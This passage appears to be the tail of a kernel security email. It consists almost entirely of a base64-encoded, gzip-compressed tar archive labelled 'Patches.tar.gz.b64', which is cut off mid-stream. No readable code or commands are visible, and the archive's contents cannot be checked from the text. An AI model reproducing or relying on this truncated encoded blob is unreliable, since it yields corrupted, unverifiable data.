and\nsecurity@kernel.\n\n\n========================================================================\nPatches.tar.gz.b64\n========================================================================\n\n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\n6LtyswIVzOoheuygZbllVYwi9JRtM6eIGYkchIrVJQjkCnWQfr2XixRkCI9G+0i8enn09mfvn4fH\nb16+PqrbLeG0RLfRUK8e6XlV08XKjt5IoXEq+aA8Z2o5qVehOHlnH7LJY1jF6ofA7J19aGQ5hHSf\nzj6U3jCzs+E0wR65Wqb1TbvjNLVd6WJ3RhICCQXfgmqdz6uAmDyCI/7MbsarH+M6FS3hk6I5Ebc2\nA6F9Bu/ad2+eevyYNYxafdtrILWgsddToa6RBMkDQmWajXMLOfYR9EJbjui01XScDOPNO7ZD4b03\ntEM7mKqYkFCqj3nRUJlOduf+wp+knTNV8o2U4qkMElCXv1udin84brfXs/jmbu3//Plfd9hvzzG7\n64/j1Wl7IiezxVV7DCwGD/0WuE94Bk/9I11Abo3/s+1y/L/jDO7P/77Y+V80dCLfCWENuK7V60u7\n545kV4Z9p4cBAL1IBpj+Nfza/h9Dnf8P1umewIUqeKGiH/85vtelhUrHfo/H6Qwlzcl8nMRXjIKH\nDCIdJ6dny/EVgqcujQJKGfvkv1cJMFFootHhKINaFcrgJUjL0QrzzJJnyQwR1+pX6vgPFHWj26CE\no0EGoO/s4d8T1xhaKzxL1oMHb7ao8kMC9UVbUC3LcmXU6QyHsRuOypA9XFRZTvkHsumB47RsVzTp\nc5Rj0xQtP0WJCfFTFCSPQMvZhsFFZ+mqnWfs5SlS8fVzeA1PMyteddE